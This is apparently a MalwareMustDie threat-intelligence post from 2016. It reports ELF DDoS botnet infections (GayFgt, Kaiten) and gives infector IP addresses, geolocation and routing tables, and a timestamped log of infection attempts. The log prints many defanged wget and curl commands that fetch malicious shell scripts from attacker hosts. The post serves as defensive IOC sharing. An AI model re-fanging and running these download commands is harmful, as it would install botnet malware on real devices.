Sunday, February 7, 2016

MMD-0052-2016 - SkidDDOS ELF infection Jan-Feb 2016

Background

These are the statistic comprehensional data for the infection of the ELF malware DDOS-er which its source codes we snagged and reported in previous MalwareMustDie blog post [MMD-0044-2015]. Some ELF compiled codes just slight obfuscated or silly "crypted" but they are so crack-able and you can figure it easily using the source code pattern I shared.

The IP addresses listed here are the infector hosts, which can be: (1) The hoster hired by DDOS skiddies to spread these ELF, (2) Infected server/routers/IoT/VPS that is being used to spread these ELF malware. Nonetheless, a bad hosts that either should be block before it gets a take-down, or to be cleaned up. The IOC generation or blocking rules based on this list is highly recommendable.

The intelligence for this information can not be disclosed further for the security purpose, the data belongs to the MalwareMustDie, NPO (thank you to a hard work for ELF Team team mate) and bound to our disclaimer. Yet please feel free to extract IOC to prevent these infection gone worst, or use the just released OTX IOC pulse. For the IDS/IPS/Firewall/Web filtration signature makers please use the data at will.

There is no malicious infection can be occurred by viewing this post, information posted are all in the textual form and was modified in a way that will prevent the link to outside, so it is harmless, further, this blog is hosted on Google (thank you blogger.com) infrastructure and not in our own servers.

The report of infection from 1st Jan - Feb 7th 2016

1. The summary:

Malware binary types: ELF/multiple architecture
Malware type: GayFgt(LizKebab), Kaiten (STD/Bossa/Mod)
Suspected actors: Lizard Stresser rings, aka: Sindicate, "Loony" Squad, and so on.
Total attempts: 1,158
Main download method: wgxt
Alternative download: cuxl; xxtch ; xxx-xxwnload
Download source per country:
  ------------------------
  No  Country      Count
  ------------------------
  1.  United States  39
  2.  Netherlands    12
  3.  United Kingdom 4
  4.  Latvia         3
  5.  France         3
  6.  Ukraine        1
  7.  Romania        1
  8.  Singapore      1
  9.  Poland         1
  10. Sweden         1
  11. China          1
  12. Russian        1
  13. Germany        1
  14. Moldova        1
2. Interactive Map:

a

Powered by my friend's (JC SoCal's cool GIPC)

3. CSV GeoIP Database:

107.172.23.133, Buffalo, 14221, United States, 42.9864, -78.7279
158.69.205.212, Pasadena, 91124, United States, 33.7866, -118.2987
158.69.217.211, Pasadena, 91124, United States, 33.7866, -118.2987
162.208.8.203, Glenview, 60025, United States, 42.0855, -87.8247
162.213.195.144, Austin, 78751, United States, 30.3106, -97.7227
163.47.11.201, Singapore, - , Singapore, 1.2931, 103.8558
173.208.196.202, Kansas City, 64106, United States, 39.1068, -94.566
173.214.160.90, Secaucus, 07094, United States, 40.7801, -74.0633
173.242.119.122, Clarks Summit, 18411, United States, 41.4486, -75.728
176.123.29.105, Chisinau, - , Moldova Republic of, 47.0056, 28.8575
178.19.111.244, Tarnowskie Gory, 42-600, Poland, 50.4485, 18.8515
185.112.249.111, Coventry, CV1, United Kingdom, 52.4167, -1.55
185.112.249.253, Coventry, CV1, United Kingdom, 52.4167, -1.55
185.112.249.26, Coventry, CV1, United Kingdom, 52.4167, -1.55
185.130.5.200, - , - , - , Latvia, Lithuania, 56.00, 24.00
185.130.5.205, - , - , - , Latvia, Lithuania, 56.00, 24.00
185.130.5.246, - , - , - , Latvia, Lithuania, 56.00, 24.00
185.17.30.239, - , - , Russian Federation, 55.75, 37.6166
185.29.9.253, Stockholm, 173 11, Sweden, 59.3333, 18.05
185.52.2.114, - , - , Netherlands, 52.3667, 4.9
185.62.189.11, - , - , Netherlands, 52.3667, 4.9
185.62.190.156, - , - , Netherlands, 52.3667, 4.9
185.62.190.253, - , - , Netherlands, 52.3667, 4.9
185.62.190.62, - , - , Netherlands, 52.3667, 4.9
192.227.170.67, Buffalo, 14221, United States, 42.9864, -78.7279
192.227.177.120, Buffalo, 14221, United States, 42.9864, -78.7279
192.227.177.127, Buffalo, 14221, United States, 42.9864, -78.7279
192.243.109.128, Glenview, 60025, United States, 42.0855, -87.8247
192.243.109.5, Glenview, 60025, United States, 42.0855, -87.8247
198.12.97.67, Buffalo, 14221, United States, 42.9864, -78.7279
198.12.97.93, Buffalo, 14221, United States, 42.9864, -78.7279
198.23.238.203, Buffalo, 14221, United States, 42.9864, -78.7279
198.23.238.215, Buffalo, 14221, United States, 42.9864, -78.7279
198.23.238.251, Buffalo, 14221, United States, 42.9864, -78.7279
199.180.133.178, Kansas City, 64106, United States, 39.1068, -94.566
199.180.133.214, Kansas City, 64106, United States, 39.1068, -94.566
199.231.184.237, Secaucus, 07094, United States, 40.7801, -74.0633
206.72.207.194, Secaucus, 07094, United States, 40.7801, -74.0633
208.67.1.142, Kansas City, 64116, United States, 39.1472, -94.5735
208.67.1.165, Kansas City, 64116, United States, 39.1472, -94.5735
208.67.1.2, Kansas City, 64116, United States, 39.1472, -94.5735
208.67.1.3, Kansas City, 64116, United States, 39.1472, -94.5735
208.67.1.40, Kansas City, 64116, United States, 39.1472, -94.5735
208.67.1.52, Kansas City, 64116, United States, 39.1472, -94.5735
208.67.1.73, Kansas City, 64116, United States, 39.1472, -94.5735
208.67.1.88, Kansas City, 64116, United States, 39.1472, -94.5735
208.73.207.236, Secaucus, 07094, United States, 40.7801, -74.0633
208.89.211.111, Kansas City, 64106, United States, 39.1068, -94.566
208.89.211.141, Kansas City, 64106, United States, 39.1068, -94.566
216.158.225.7, Secaucus, 07094, United States, 40.7801, -74.0633
218.104.49.211, - , - , China, 35.0, 105.0
23.227.163.110, - , - , United States, 38.0, -97.0
23.89.158.69, Los Angeles, 90017, United States, 34.053, -118.2642
23.94.29.218, Buffalo, 14221, United States, 42.9864, -78.7279
31.14.136.142, - , - , Romania, 46.0, 25.0
45.32.232.197, Amsterdam, 1000, Netherlands, 52.35, 4.9167
46.101.71.240, London, EC4N, United Kingdom, 51.5142, -0.0931
5.196.249.163, - , - , France, 48.86, 2.35
51.254.212.84, - , - , France, 48.86, 2.35
51.254.238.19, - , - , France, 48.86, 2.35
64.20.33.134, Secaucus, 07094, United States, 40.7801, -74.0633
74.118.193.239, Clarks Summit, 18411, United States, 41.4486, -75.728
79.143.181.158, - , - , Germany, 51.0, 9.0
80.82.64.177, - , - , Netherlands, 52.3667, 4.9
89.248.162.171, - , - , Netherlands, 52.3667, 4.9
89.248.166.131, - , - , Netherlands, 52.3667, 4.9
93.171.158.242, Khmelnitskiy, - , Ukraine, 47.7278, 34.1372
94.102.49.197, - , - , Netherlands, 52.3667, 4.9
94.102.53.144, - , - , Netherlands, 52.3667, 4.9
94.102.63.136, - , - , Netherlands, 52.3667, 4.9

4. CSV Network Routing Databse

107.172.23.133,"biz.kcscleaning.net".  ,36352 , 107.172.20.0/22 , AS-COLOCROSSING , US , nwnx.net , New Wave Netconnect LLC
158.69.205.212,"212.ip-158-69-205.net".,16276 , 158.69.0.0/16 , OVH , FR , parsons.com , Parsons Corporation
158.69.217.211,"211.ip-158-69-217.net",16276 , 158.69.0.0/16 , OVH , FR , parsons.com , Parsons Corporation
162.208.8.203 , - ,11878 , 162.208.8.0/22 , TZULO , US , vpscheap.net , VPS Cheap Inc.
162.213.195.144, - ,54540 , 162.213.195.0/24 , INCERO , US , inceronetwork.com , Incero LLC
163.47.11.201, - ,133165 , 163.47.8.0/22 , DIGITALOCEAN-AS , SG , digitalocean.com , Digital Ocean Inc.
173.208.196.202, - ,32097 , 173.208.128.0/17 , WII-KC , US , goldvipclub.com , Gold VIP Club
173.214.160.90,"scrubzei.com",19318 , 173.214.160.0/24 , NJIIX-AS-1 , US , interserver.net , Interserver Inc
173.242.119.122, - ,46664 , 173.242.119.0/24 , VOLUMEDRIVE , US , volumedrive.com , VolumeDrive
176.123.29.105,"176-123-29-105.alexhost.md",200019 , 176.123.0.0/19 , ASCLOUDATA , MD , alexhost.md , AlexHost SRL
178.19.111.244,"traderproject.com",59491 , 178.19.104.0/21 , LIVENET , PL , sitel.net.pl , SITEL Sp z o. o.
185.112.249.111, - ,42831 , 185.112.249.0/24 , UKSERVERS , GB , - , -
185.112.249.253,"pocztafoundation.swidnica.pl",42831 , 185.112.249.0/24 , UKSERVERS , GB , - , -
185.112.249.26,"no.rdns.sharkservers.net",42831 , 185.112.249.0/24 , UKSERVERS , GB , - , -
185.130.5.200, - ,203569 , 185.130.5.0/24 , SILK , LT , - , Sindicate Group Ltd
185.130.5.205, - ,203569 , 185.130.5.0/24 , SILK , LT , - , Sindicate Group Ltd
185.130.5.246, - ,203569 , 185.130.5.0/24 , SILK , LT , - , Sindicate Group Ltd
185.17.30.239, - ,199420 , 185.17.28.0/22 , FLYGROUP , RU , fly-group.ru , OOO Fly Engeneering Group
185.29.9.253,"ip-9-253.dataclub.biz",60567 , 185.29.9.0/24 , DATACLUB , SE , dataclub.biz , Virtual Servers
185.52.2.114,"web.minsupport.net",198203 , 185.52.0.0/22 , ASN , NL , ramnode.com , RamNode LLC
185.62.189.11,"cacti.s42.voby.se",49349 , 185.62.189.0/24 , DOTSI , PT , nforce.com , NForce Entertainment B.V.
185.62.190.156,"hosted-by.blazingfast.io",49349 , 185.62.190.0/24 , DOTSI , PT , nforce.com , NForce Entertainment B.V.
185.62.190.253,"hosted-by.blazingfast.io",49349 , 185.62.190.0/24 , DOTSI , PT , nforce.com , NForce Entertainment B.V.
185.62.190.62,"hosted-by.blazingfast.io",49349 , 185.62.190.0/24 , DOTSI , PT , nforce.com , NForce Entertainment B.V.
192.227.170.67,"www.AlphaNineVPS.com",36352 , 192.227.168.0/21 , AS-COLOCROSSING , US , hudsonvalleyhost.com , Hudson Valley Host
192.227.177.120,"192-227-177-120-host.colocrossing.com",36352 , 192.227.176.0/22 , AS-COLOCROSSING , US , nwnx.net , New Wave Netconnect LLC
192.227.177.127,"192-227-177-127-host.colocrossing.com",36352 , 192.227.176.0/22 , AS-COLOCROSSING , US , nwnx.net , New Wave Netconnect LLC
192.243.109.128, - ,11878 , 192.243.96.0/20 , TZULO , US , vpscheap.net , VPS Cheap Inc.
192.243.109.5, - ,11878 , 192.243.96.0/20 , TZULO , US , vpscheap.net , VPS Cheap Inc.
198.12.97.67,"198-12-97-67-host.enwebhost.net",36352 , 198.12.96.0/20 , AS-COLOCROSSING , US , colocrossing.com , ColoCrossing
198.12.97.93,"198-12-97-93-host.enwebhost.net",36352 , 198.12.96.0/20 , AS-COLOCROSSING , US , colocrossing.com , ColoCrossing
198.23.238.203,"198-23-238-203-host.enwebhost.net",36352 , 198.23.232.0/21 , AS-COLOCROSSING , US , enwebhost.net , Enwebhost
198.23.238.215,"198-23-238-215-host.enwebhost.net",36352 , 198.23.232.0/21 , AS-COLOCROSSING , US , enwebhost.net , Enwebhost
198.23.238.251,"198-23-238-251-host.enwebhost.net",36352 , 198.23.232.0/21 , AS-COLOCROSSING , US , enwebhost.net , Enwebhost
199.180.133.178,"watchhere.docadvices.com",23033 , 199.180.133.0/24 , WOW , US , virpus.com , DNSSlave.com
199.180.133.214, - ,23033 , 199.180.133.0/24 , WOW , US , virpus.com , DNSSlave.com
199.231.184.237,"mail10.sipanhost.com",19318 , 199.231.184.0/21 , NJIIX-AS-1 , US , interserver.net , Interserver Inc
206.72.207.194,"lht194.cowanci.com",19318 , 206.72.192.0/20 , NJIIX-AS-1 , US , interserver.net , Interserver Inc
208.67.1.142, - ,33387 , 208.67.1.0/24 , DATASHACK , US , wholesaledatacenter.com , Wholesale Data Center LLC
208.67.1.165, - ,33387 , 208.67.1.0/24 , DATASHACK , US , wholesaledatacenter.com , Wholesale Data Center LLC
208.67.1.2, - ,33387 , 208.67.1.0/24 , DATASHACK , US , hmccah.com , HMC/Cah
208.67.1.3, - ,33387 , 208.67.1.0/24 , DATASHACK , US , hmccah.com , HMC/Cah
208.67.1.40, - ,33387 , 208.67.1.0/24 , DATASHACK , US , wholesaledatacenter.com , Fletcher Grant
208.67.1.52, - ,33387 , 208.67.1.0/24 , DATASHACK , US , wholesaledatacenter.com , Wholesale Data Center LLC
208.67.1.73, - ,33387 , 208.67.1.0/24 , DATASHACK , US , tricension.net , Tricension
208.67.1.88, - ,33387 , 208.67.1.0/24 , DATASHACK , US , tricension.net , Tricension
208.73.207.236,"sonypaio.com",19318 , 208.73.200.0/21 , NJIIX-AS-1 , US , interserver.net , Interserver Inc
208.89.211.111,"server6.lega-helplineservice.com",23033 , 208.89.211.0/24 , WOW , US , virpus.com , DNSSlave.com
208.89.211.141, - ,23033 , 208.89.211.0/24 , WOW , US , virpus.com , DNSSlave.com
216.158.225.7,"server.iceybinary.com",19318 , 216.158.224.0/23 , NJIIX-AS-1 , US , interserver.net , Interserver Inc
218.104.49.211, - ,9929 , 218.104.48.0/23 , CNCNET , CN , chinaunicom.com , China Unicom IP Network
23.227.163.110, - ,54540 , 23.227.163.0/24 , INCERO , US , inceronetwork.com , Incero LLC
23.89.158.69,"69.158-89-23.rdns.scalabledns.com",18978 , 23.89.128.0/18 , ENZUINC-US , US , enzu.com , Enzu Inc
23.94.29.218,"23-94-29-218-host.colocrossing.com",36352 , 23.94.16.0/20 , AS-COLOCROSSING , US , nwnx.net , New Wave Netconnect LLC
31.14.136.142,"host142-136-14-31.serverdedicati.aruba.it",31034 , 31.14.128.0/20 , ARUBA , IT , jump.ro , Jump Management SRL
45.32.232.197,"45.32.232.197.vultr.com",20473 , 45.32.232.0/21 , AS-CHOOPA , US , choopa.com , Choopa LLC
46.101.71.240, - ,201229 , 46.101.68.0/22 , DIGITALOCEAN , DE , digitalocean.com , Digital Ocean Inc.
5.196.249.163, - ,16276 , 5.196.0.0/16 , OVH , FR , ovh.com , OVH SAS
51.254.212.84,"84.ip-51-254-212.eu",16276 , 51.254.0.0/15 , OVH , FR , ovh.com , OVH SAS
51.254.238.19, - ,16276 , 51.254.0.0/15 , OVH , FR , ovh.com , OVH SAS
64.20.33.134,"test.interserver.net",19318 , 64.20.32.0/19 , NJIIX-AS-1 , US , fasttechrev.com , Hosting Needs
74.118.193.239,"mail.rodesleads.info",46664 , 74.118.192.0/22 , VOLUMEDRIVE , US , volumedrive.com , VolumeDrive
79.143.181.158,"vmi59412.contabo.host",51167 , 79.143.180.0/23 , CONTABO , DE , contabo.de , Contabo GmbH
80.82.64.177, - ,29073 , 80.82.64.0/24 , QUASINETWORKS , NL , ecatel.net , Ecatel LTD
89.248.162.171,"no-reverse-dns-configured.com",29073 , 89.248.160.0/21 , QUASINETWORKS , NL , ecatel.net , Ecatel LTD
89.248.166.131,"no-reverse-dns-configured.com",29073 , 89.248.160.0/21 , QUASINETWORKS , NL , ecatel.net , Ecatel LTD
93.171.158.242,"ua63.com",201094 , 93.171.158.0/23 , GMHOST , UA , - , PE Dunaeivskyi Denys Leonidovich
94.102.49.197,"no-reverse-dns-configured.com",29073 , 94.102.48.0/20 , QUASINETWORKS , NL , ecatel.net , Ecatel LTD
94.102.53.144, - ,29073 , 94.102.48.0/20 , QUASINETWORKS , NL , ecatel.net , Ecatel LTD
94.102.63.136,"no-reverse-dns-configured.com",29073 , 94.102.48.0/20 , QUASINETWORKS , NL , ecatel.net , Ecatel LTD

5. Log of infection attempts time stamp (as cyber incident evidence):

2016-02-07 09:28:17 | wget hxxp:// 199.180.133.178/gb . sh
2016-02-07 07:32:41 | wget -q hxxp:// 198.23.238.215/Sharky/gb . sh
2016-02-07 07:32:40 | wget -q hxxp:// 198.23.238.215/Sharky/gb . sh
2016-02-07 02:53:41 | wget ftx://199.231.184.237/gtop . sh
2016-02-07 02:53:19 | wget ftx://199.231.184.237/gtop . sh
2016-02-07 02:43:05 | wget -q hxxp:// 198.23.238.215/Sharky/gb . sh
2016-02-07 02:43:03 | wget -q hxxp:// 198.23.238.215/Sharky/gb . sh
2016-02-06 21:13:35 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-06 21:08:45 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-06 20:07:20 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-06 19:05:34 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-06 16:45:10 | wget hxxp:// 173.208.196.202/bin . sh
2016-02-06 16:39:47 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 16:39:47 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 16:21:26 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 16:21:24 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 16:07:20 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 16:07:19 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 16:01:37 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-06 15:56:40 | wget hxxp:// 173.208.196.202/bin . sh
2016-02-06 15:26:51 | wget ftx://199.231.184.237/gtop . sh
2016-02-06 15:26:29 | wget ftx://199.231.184.237/gtop . sh
2016-02-06 15:20:01 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 15:10:50 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 15:10:49 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 15:03:38 | wget -q hxxp:// 208.67.1.88/Bots . sh; 
                              curl -O hxxp:// 208.67.1.88/Bots . sh
2016-02-06 14:50:55 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 14:50:55 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 14:32:41 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 14:32:40 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 14:19:15 | wget ftx://199.231.184.237/gtop . sh
2016-02-06 14:18:29 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 14:18:28 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 14:10:31 | wget ftx://199.231.184.237/gtop . sh
2016-02-06 05:54:46 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-06 05:53:55 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-06 05:14:34 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-06 05:10:55 | wget hxxp:// 173.208.196.202/bin . sh
2016-02-06 05:00:33 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-06 04:50:58 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-06 04:48:09 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-06 04:38:09 | wget hxxp:// 173.208.196.202/bin . sh
2016-02-06 04:37:42 | wget hxxp:// 173.208.196.202/bin . sh
2016-02-06 04:06:58 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-06 03:53:04 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-06 03:41:42 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-06 03:26:44 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-06 03:11:10 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-06 02:52:44 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-06 02:49:12 | wget ftx://199.231.184.237/gtop . sh
2016-02-06 02:41:54 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-06 02:38:04 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 02:16:13 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 01:36:28 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-06 01:22:23 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-06 00:56:47 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-05 23:35:07 | wget ftx://199.231.184.237/gtop . sh
2016-02-05 23:02:54 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-05 22:59:49 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-05 22:48:41 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-05 22:48:41 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-05 22:35:55 | wget hxxp:// 208.67.1.73/gtop . sh
2016-02-05 22:27:07 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-05 22:27:07 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-05 22:08:38 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-05 22:08:38 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-05 21:54:59 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-05 21:54:59 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-05 21:47:52 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-02-05 21:47:52 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-02-05 20:34:10 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-05 20:30:07 | wget hxxp:// 185.62.190.253/h . sh
2016-02-05 19:37:34 | wget ftx://199.231.184.237/gtop . sh
2016-02-05 19:12:30 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-05 17:37:32 | wget -q hxxp:// 23.227.163.110/Bots/Bots . sh
2016-02-05 17:25:07 | wget -q hxxp:// 208.67.1.88/Bots . sh;
                              curl -O hxxp:// 208.67.1.88/Bots . sh
2016-02-05 17:11:41 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-05 16:57:42 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-05 16:53:47 | wget hxxp:// "www.hongcherng.com"/rd/rd . sh-O /tmp/rd . sh
2016-02-05 16:35:55 | wget hxxp:// 185.17.30.239/gb . sh-O /dev/gb . sh
2016-02-05 16:28:58 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-05 16:14:51 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-05 15:25:48 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-05 15:23:33 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-05 15:22:29 | wget ftx://199.231.184.237/gtop . sh
2016-02-05 14:49:42 | wget ftx://199.231.184.237/gtop . sh
2016-02-05 14:24:34 | wget ftx://199.231.184.237/gtop . sh
2016-02-05 12:57:25 | wget hxxp:// 51.254.212.84/busybox . sh
2016-02-05 05:17:28 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-05 05:17:24 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-05 05:02:22 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-05 04:16:29 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-05 03:13:40 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-05 03:13:37 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-05 03:08:11 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-05 02:53:57 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-05 02:27:49 | wget -q hxxp:// 185.52.2.114/h . sh
2016-02-05 01:53:07 | wget -q hxxp:// 208.67.1.88/Bots . sh;
                              curl -O hxxp:// 208.67.1.88/Bots . sh
2016-02-04 23:57:43 | wget -q hxxp:// 208.67.1.88/Bots . sh;
                              curl -O hxxp:// 208.67.1.88/Bots . sh
2016-02-04 23:52:45 | wget hxxp:// 208.67.1.73/gtop . sh
2016-02-04 23:37:23 | wget hxxp:// 208.67.1.73/gtop . sh
2016-02-04 23:31:59 | wget -q hxxp:// 208.67.1.88/Bots . sh;
                              curl -O hxxp:// 208.67.1.88/Bots . sh
2016-02-04 23:19:54 | wget -q hxxp:// 185.130.5.200/bin . sh;
                              curl -O hxxp:// 185.130.5.200/bin . sh
2016-02-04 21:39:37 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-04 21:39:35 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-04 16:42:04 | wget -q hxxp:// 185.52.2.114/h . sh
2016-02-04 09:08:52 | wget hxxp:// 185.17.30.239/gb . sh-O /dev/gb . sh
2016-02-04 08:18:15 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-04 08:18:12 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-04 05:37:42 | wget -q hxxp:// 51.254.212.84/busybox . sh
2016-02-04 02:24:07 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-03 22:03:45 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-03 21:53:31 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-03 20:53:03 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-03 20:50:56 | wget hxxp:// 199.231.184.237/gtop . sh
2016-02-03 19:27:27 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-03 19:13:31 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-03 15:26:15 | wget hxxp:// 185.112.249.111/gtop . sh
2016-02-03 15:09:15 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-03 14:55:09 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-03 14:47:47 | wget hxxp:// 185.112.249.111/gtop . sh
2016-02-03 13:56:59 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-03 13:40:26 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-03 08:12:38 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-03 08:12:35 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-03 05:18:19 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-03 05:06:33 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-03 04:52:47 | wget hxxp:// 176.123.29.105/bin . sh
2016-02-03 02:26:22 | wget hxxp:// 208.67.1.142/hack/Binarys . sh
2016-02-03 01:10:27 | wget hxxp:// 192.243.109.5/DOGDICKS/gtop . sh
2016-02-03 00:58:32 | wget hxxp:// 192.243.109.5/DOGDICKS/gtop . sh
2016-02-03 00:01:30 | wget hxxp:// 192.243.109.5/DOGDICKS/gtop . sh
2016-02-02 22:43:01 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-02 22:36:19 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-02 21:28:54 | wget hxxp:// 192.243.109.5/DOGDICKS/gtop . sh
2016-02-02 18:25:35 | wget hxxp:// 185.17.30.239/gb . sh-O /dev/gb . sh
2016-02-02 13:34:51 | wget hxxp:// 185.112.249.111/gtop . sh
2016-02-02 13:16:29 | wget hxxp:// 192.243.109.5/DOGDICKS/gtop . sh
2016-02-02 13:06:42 | wget hxxp:// 185.112.249.111/gtop . sh
2016-02-02 12:46:48 | wget hxxp:// 185.112.249.111/gtop . sh
2016-02-02 11:05:21 | wget hxxp:// 192.243.109.5/DOGDICKS/gtop . sh
2016-02-02 06:32:25 | wget hxxp:// 185.17.30.239/gb . sh-O /dev/gb . sh
2016-02-02 01:53:15 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-02 01:53:15 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-01 23:43:22 | wget hxxp:// 192.243.109.5/DOGDICKS/gtop . sh
2016-02-01 22:41:07 | wget hxxp:// feds.pw/feds/gb . sh
2016-02-01 17:10:33 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-01 16:15:24 | wget hxxp:// 192.243.109.5/DOGDICKS/gtop . sh
2016-02-01 13:35:18 | wget hxxp:// 185.17.30.239/gb . sh-O /dev/gb . sh
2016-02-01 11:48:58 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-01 07:21:48 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-01 07:21:48 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-01 06:52:14 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-01 05:19:06 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-01 05:00:00 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-01 04:39:36 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-01 03:42:21 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-01 02:48:13 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-01 02:43:18 | wget hxxp:// 185.29.9.253/DOGDICKS/Binarys . sh
2016-02-01 01:59:09 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-01 01:27:37 | wget hxxp:// 107.172.23.133/gtop . sh
2016-02-01 01:24:01 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-01 01:10:43 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-01 01:10:42 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-01 01:05:45 | wget hxxp:// 107.172.23.133/gtop . sh
2016-02-01 01:00:10 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-01 00:01:05 | wget hxxp:// 107.172.23.133/gtop . sh
2016-02-01 00:00:16 | wget hxxp:// 185.112.249.253/gtop . sh
2016-01-31 23:28:54 | wget hxxp:// 185.112.249.253/gtop . sh
2016-01-31 20:34:57 | wget hxxp:// 185.112.249.253/gtop . sh
2016-01-31 20:23:47 | wget hxxp:// 185.112.249.253/gtop . sh
2016-01-31 20:06:58 | wget hxxp:// 192.243.109.5/DOGDICKS/gtop . sh
2016-01-31 19:38:03 | wget hxxp:// 185.112.249.253/gtop . sh
2016-01-31 17:02:29 | wget hxxp:// 185.112.249.253/gtop . sh
2016-01-31 12:19:56 | wget hxxp:// 192.243.109.5/DOGDICKS/gtop . sh
2016-01-31 10:30:13 | wget hxxp:// 192.243.109.5/DOGDICKS/gtop . sh
2016-01-31 06:55:10 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-31 05:11:34 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-31 04:36:29 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-31 01:42:39 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-31 01:29:38 | wget -q hxxp:// 173.242.119.122/lol . sh
2016-01-31 01:27:33 | wget -q hxxp:// 173.242.119.122/lol . sh
2016-01-31 01:17:19 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-31 00:53:32 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-31 00:49:01 | wget -q hxxp:// 173.242.119.122/lol . sh
2016-01-31 00:43:49 | wget -q hxxp:// 173.242.119.122/lol . sh
2016-01-31 00:06:36 | wget -q hxxp:// 173.242.119.122/lol . sh
